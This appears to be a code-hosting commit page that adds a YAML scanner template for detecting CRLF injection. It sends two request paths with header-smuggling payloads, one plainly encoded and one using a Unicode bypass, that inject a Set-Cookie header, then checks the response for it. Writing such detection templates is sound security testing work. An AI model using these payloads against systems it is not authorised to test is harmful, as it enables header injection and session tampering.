CRLF injection
CRLF injection with normal encoding and unicode bypass encoding https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20Injectionpatch-1
parent
68fff10c89
commit
73d4a18752
|
@ -0,0 +1,16 @@
|
|||
id: crlf-injection
|
||||
|
||||
info:
|
||||
name: CRLF injection
|
||||
author: nadino
|
||||
severity: low
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/%0D%0ASet-Cookie:crlfinjection=crlfinjection"
|
||||
- "{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection" #unicode bypass
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(set_cookie,"crlfinjection")'
|
Loading…
Reference in New Issue